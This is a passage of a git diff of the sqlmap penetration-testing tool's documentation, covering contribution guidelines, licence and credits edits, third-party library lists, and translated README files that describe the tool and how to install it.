manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. +* Make sure you can reproduce the bug with the latest development version of sqlmap. +* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. +* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* + +## Submitting code changes + +All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). + +Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). +Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! + +### Guidelines + +In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: + +* Each patch should make one logical change. +* Wrap code to 76 columns when possible. +* Avoid tabbing, use four blank spaces instead. +* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org). +* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. +* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. +* Style that is too different from main branch will be ''adapted'' by the developers side. +* Do not touch anything inside `thirdparty/` and `extra/` folders. + +### Licensing + +By submitting code contributions to the sqlmap developers or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. diff --git a/doc/COPYING b/doc/COPYING index 880d8774b..8854b1339 100644 --- a/doc/COPYING +++ b/doc/COPYING @@ -1,7 +1,7 @@ COPYING -- Describes the terms under which sqlmap is distributed. A copy of the GNU General Public License (GPL) is appended to this file. -sqlmap is (C) 2006-2015 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. +sqlmap is (C) 2006-2017 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. This program is free software; you may redistribute and/or modify it under the terms of the GNU General Public License as published by the Free @@ -46,14 +46,14 @@ to know exactly what a program is going to do before they run it. Source code also allows you to fix bugs and add new features. You are highly encouraged to send your changes to dev@sqlmap.org for possible incorporation into the main distribution. By sending these changes to the -sqlmap developers, to the mailing lists, or via Git pull request, checking -them into the sqlmap source code repository, it is understood (unless you -specify otherwise) that you are offering the sqlmap project the unlimited, -non-exclusive right to reuse, modify, and relicense the code. sqlmap will -always be available Open Source, but this is important because the -inability to relicense code has caused devastating problems for other Free -Software projects (such as KDE and NASM). If you wish to specify special -license conditions of your contributions, just say so when you send them. +sqlmap developers or via Git pull request, checking them into the sqlmap +source code repository, it is understood (unless you specify otherwise) +that you are offering the sqlmap project the unlimited, non-exclusive +right to reuse, modify, and relicense the code. sqlmap will always be +available Open Source, but this is important because the inability to +relicense code has caused devastating problems for other Free Software +projects (such as KDE and NASM). If you wish to specify special license +conditions of your contributions, just say so when you send them. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of @@ -361,7 +361,6 @@ This license does not apply to the following components: * The MultipartPost library located under thirdparty/multipartpost/. * The Odict library located under thirdparty/odict/. * The Oset library located under thirdparty/oset/. -* The PageRank library located under thirdparty/pagerank/. * The PrettyPrint library located under thirdparty/prettyprint/. * The PyDes library located under thirdparty/pydes/. * The SocksiPy library located under thirdparty/socks/. diff --git a/doc/FAQ.pdf b/doc/FAQ.pdf index d0a91bdb3..0a17b98f3 100644 Binary files a/doc/FAQ.pdf and b/doc/FAQ.pdf differ diff --git a/doc/README.pdf b/doc/README.pdf index a3ddc647a..fd5e4f72a 100644 Binary files a/doc/README.pdf and b/doc/README.pdf differ diff --git a/doc/THANKS.md b/doc/THANKS.md index 931ab73bc..6e9f85819 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -139,7 +139,7 @@ Jim Forster, * for reporting a bug Rong-En Fan, -* for commiting the sqlmap 0.5 port to the official FreeBSD project repository +* for committing the sqlmap 0.5 port to the official FreeBSD project repository Giorgio Fedon, * for suggesting a speed improvement for bisection algorithm @@ -173,6 +173,9 @@ Ivan Giacomelli, * for suggesting a minor enhancement * for reviewing the documentation +Dimitris Giannitsaros, +* for contributing a REST-JSON API client + Nico Golde, * for reporting a couple of bugs @@ -559,7 +562,7 @@ Kazim Bugra Tombul, * for reporting a minor bug Efrain Torres, -* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository +* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository * for his great Metasploit WMAP Framework Sandro Tosi, diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md index f2479b31a..2bf01b6ea 100644 --- a/doc/THIRD-PARTY.md +++ b/doc/THIRD-PARTY.md @@ -12,7 +12,7 @@ This file lists bundled packages and their associated licensing terms. Copyright (C) 2005, Zope Corporation. Copyright (C) 1998-2000, Gisle Aas. * The Colorama library located under thirdparty/colorama/. - Copyright (C) 2010, Jonathan Hartley. + Copyright (C) 2013, Jonathan Hartley. * The Fcrypt library located under thirdparty/fcrypt/. Copyright (C) 2000, 2001, 2004 Carey Evans. * The Odict library located under thirdparty/odict/. @@ -281,8 +281,6 @@ be bound by the terms and conditions of this License Agreement. * The bottle web framework library located under thirdparty/bottle/. Copyright (C) 2012, Marcel Hellkamp. -* The PageRank library located under thirdparty/pagerank/. - Copyright (C) 2010, Corey Goldberg. * The Termcolor library located under thirdparty/termcolor/. Copyright (C) 2008-2011, Volvox Development Team. @@ -312,3 +310,5 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. * The PyDes library located under thirdparty/pydes/. Copyleft 2009, Todd Whiteman. +* The win_inet_pton library located under thirdparty/wininetpton/. + Copyleft 2014, Ryan Vennell. diff --git a/doc/translations/README-bg-BG.md b/doc/translations/README-bg-BG.md new file mode 100644 index 000000000..80daf852b --- /dev/null +++ b/doc/translations/README-bg-BG.md @@ -0,0 +1,50 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![Лиценз](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система. + +Демо снимки +---- + +![Снимка на екрана](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Можете да посетите [колекцията от снимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи някои функции, качени на wiki. + +Инсталиране +---- + +Може да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master). + +За предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището: + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6.x** и **2.7.x** на всички платформи. + +Използване +---- + +За да получите списък с основните опции използвайте: + + python sqlmap.py -h + +За да получите списък с всички опции използвайте: + + python sqlmap.py -hh + +Може да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601). +За да разберете възможностите на sqlmap, списък на поддържаните функции и описание на всички опции, заедно с примери, се препоръчва да се разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Връзки +---- + +* Начална страница: http://sqlmap.org +* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues +* Упътване: https://github.com/sqlmapproject/sqlmap/wiki +* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-es-MX.md b/doc/translations/README-es-MX.md new file mode 100644 index 000000000..d81139c84 --- /dev/null +++ b/doc/translations/README-es-MX.md @@ -0,0 +1,49 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band". + +Capturas de Pantalla +--- +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki). + +Instalación +--- + +Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master). + +Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma. + +Uso +--- + +Para obtener una lista de opciones básicas: + + python sqlmap.py -h + +Para obtener una lista de todas las opciones: + + python sqlmap.py -hh + +Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601). +Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Enlaces +--- + +* Página principal: http://sqlmap.org +* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues +* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki +* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-fr-FR.md b/doc/translations/README-fr-FR.md new file mode 100644 index 000000000..e1cbec97d --- /dev/null +++ b/doc/translations/README-fr-FR.md @@ -0,0 +1,49 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +**sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation. + +---- + +![Les Captures d'écran](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) démontrent des fonctionnalités de __sqlmap__. + +Installation +---- + +Vous pouvez télécharger le plus récent fichier tarball en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger le plus récent archive zip [ici](https://github.com/sqlmapproject/sqlmap/zipball/master). + +De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/) + +Usage +---- + +Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez: + + python sqlmap.py -h + +Pour afficher une liste complète des options et des commutateurs (switches), tapez: + + python sqlmap.py -hh + +Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples. +Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage). + +Liens +---- + +* Page d'acceuil: http://sqlmap.org +* Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki +* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md index 8b09ba653..33beca420 100644 --- a/doc/translations/README-gr-GR.md +++ b/doc/translations/README-gr-GR.md @@ -1,6 +1,6 @@ -sqlmap -== +# sqlmap +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων. @@ -18,7 +18,7 @@ sqlmap Κατά προτίμηση, μπορείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήριο: - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev Το sqlmap λειτουργεί χωρίς περαιτέρω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόρμα. @@ -33,8 +33,8 @@ sqlmap python sqlmap.py -hh -Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://gist.github.com/stamparm/5335217). -Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki). +Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://asciinema.org/a/46601). +Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Σύνδεσμοι ---- @@ -45,9 +45,6 @@ sqlmap * Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues * Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki * Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md index 69e2d531d..85fe1193c 100644 --- a/doc/translations/README-hr-HR.md +++ b/doc/translations/README-hr-HR.md @@ -1,6 +1,6 @@ -sqlmap -== +# sqlmap +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza. @@ -18,7 +18,7 @@ Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/ Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap radi bez posebnih zahtjeva korištenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi. @@ -33,8 +33,8 @@ Kako biste dobili listu svih opcija i prekidača koristite: python sqlmap.py -hh -Možete pronaći primjer izvršavanja [ovdje](https://gist.github.com/stamparm/5335217). -Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki). +Možete pronaći primjer izvršavanja [ovdje](https://asciinema.org/a/46601). +Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Poveznice ---- @@ -45,9 +45,6 @@ Poveznice * Prijava problema: https://github.com/sqlmapproject/sqlmap/issues * Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki * Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) * Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md index e2957b119..4f8ec4284 100644 --- a/doc/translations/README-id-ID.md +++ b/doc/translations/README-id-ID.md @@ -1,5 +1,6 @@ -sqlmap -== +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. @@ -18,7 +19,7 @@ Anda dapat mengunduh tarball versi terbaru [di sini] Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap): - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun. @@ -33,8 +34,8 @@ Untuk mendapatkan daftar opsi lanjut gunakan: python sqlmap.py -hh -Anda dapat mendapatkan contoh penggunaan [di sini](https://gist.github.com/stamparm/5335217). -Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki). +Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601). +Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Tautan ---- @@ -45,9 +46,6 @@ Tautan * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki * Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap * Twitter: [@sqlmap](https://twitter.com/sqlmap) * Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos) * Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-it-IT.md b/doc/translations/README-it-IT.md new file mode 100644 index 000000000..c9be5355c --- /dev/null +++ b/doc/translations/README-it-IT.md @@ -0,0 +1,50 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band. + +Screenshot +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Nella wiki puoi visitare [l'elenco di screenshot](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) che mostrano il funzionamento di alcune delle funzionalità del programma. + +Installazione +---- + +Puoi scaricare l'ultima tarball cliccando [qui](https://github.com/sqlmapproject/sqlmap/tarball/master) oppure l'ultima zipball cliccando [qui](https://github.com/sqlmapproject/sqlmap/zipball/master). + +La cosa migliore sarebbe però scaricare sqlmap clonando la repository [Git](https://github.com/sqlmapproject/sqlmap): + + git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev + +sqlmap è in grado di funzionare con le versioni **2.6.x** e **2.7.x** di [Python](http://www.python.org/download/) su ogni piattaforma. + +Utilizzo +---- + +Per una lista delle opzioni e dei controlli di base: + + python sqlmap.py -h + +Per una lista di tutte le opzioni e di tutti i controlli: + + python sqlmap.py -hh + +Puoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601). +Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (disponibile solo in inglese). + +Link +---- + +* Sito: http://sqlmap.org +* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* RSS feed dei commit: https://github.com/sqlmapproject/sqlmap/commits/master.atom +* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues +* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki +* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ +* Twitter: [@sqlmap](https://twitter.com/sqlmap) +* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ja-JP.md b/doc/translations/README-ja-JP.md new file mode 100644 index 000000000..8982d303d --- /dev/null +++ b/doc/translations/README-ja-JP.md @@ -0,0 +1,51 @@ +# sqlmap + +[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) + +sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。 +強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。 + +スクリーンショット +---- + +![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +wikiに載っているいくつかの機能のデモをスクリーンショットで見ることができます。 [スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) + +インストール +---- + +最新のtarballを 